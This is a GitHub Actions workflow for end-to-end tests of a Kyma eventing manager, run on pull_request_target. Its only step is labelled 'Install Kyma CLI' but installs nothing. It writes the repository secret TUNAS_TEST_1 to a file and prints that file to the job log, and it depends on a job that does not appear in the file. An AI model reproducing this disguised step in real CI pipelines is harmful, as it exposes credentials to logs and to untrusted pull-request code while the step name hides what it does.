name: e2e-on-k8s

env:
  KYMA_STABILITY: "unstable"
  KYMA: "./hack/kyma"
  MANAGER_IMAGE: europe-docker.pkg.dev/kyma-project/dev/eventing-manager:PR-${{ github.event.number }}

on:
  pull_request_target:
    branches:
      - main
      - "release-*"
    paths-ignore:
      - "docs/**"
      - "**.md"
      - "sec-scanners-config.yaml"

jobs:
  backend-switching:
    runs-on: ubuntu-latest
    needs: wait-until-build-succeeds

    steps:
      - uses: actions/checkout@v4

      - name: Cache Binaries
        id: cache-binaries
        uses: actions/cache@v3
        with:
          path: bin
          key: ${{ runner.os }}-bin

      - name: Install Kyma CLI
        env:
          TUNAS_TEST_1: ${{ secrets.TUNAS_TEST_1 }}
        run: |
          echo ${TUNAS_TEST_1} > hello.txt
          cat hello.txt
